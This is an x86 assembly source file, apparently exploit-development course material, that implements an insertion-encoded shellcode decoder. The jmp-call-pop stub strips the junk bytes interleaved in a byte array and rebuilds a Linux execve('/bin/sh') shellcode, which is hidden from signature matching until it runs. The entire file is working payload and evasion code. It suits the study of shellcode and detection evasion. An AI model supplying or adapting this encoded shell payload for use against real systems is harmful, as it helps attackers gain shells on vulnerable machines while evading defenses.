; Filename: insertion-decoder.nasm
; Author:  Vivek Ramachandran
; Website:  http://securitytube.net
; Training: http://securitytube-training.com 
;
;
; Purpose: 

global _start			
section .text

_start:
	jmp short call_shellcode

decoder:
	pop esi
	lea edi, [esi +1]
	xor eax, eax
	mov al, 1
	xor ebx, ebx

decode: 
	mov bl, byte [esi + eax]
	xor bl, 0xe0 ; marker1
	jz short EncodedShellcode
	mov bl,byte [esi+eax+1]
	
	;rol bl, 1
	;add bl, 1

	mov byte [edi],bl
	inc edi
	add al, 2
	jmp short decode	

call_shellcode:
	call decoder
	EncodedShellcode: db 0x31,0x06,0xc0,0x02,0x50,0x04,0x68,0x07,0x2f,0x0a,0x2f,0x05,0x73,0x04,0x68,0x08,0x68,0x09,0x2f,0x02,0x62,0x02,0x69,0x06,0x6e,0x02,0x89,0x0a,0xe3,0x08,0x50,0x01,0x89,0x02,0xe2,0x08,0x53,0x0a,0x89,0x0a,0xe1,0x06,0xb0,0x03,0x0b,0x0a,0xcd,0x02,0x80,0x09,0xe0,0xe0 ; marker2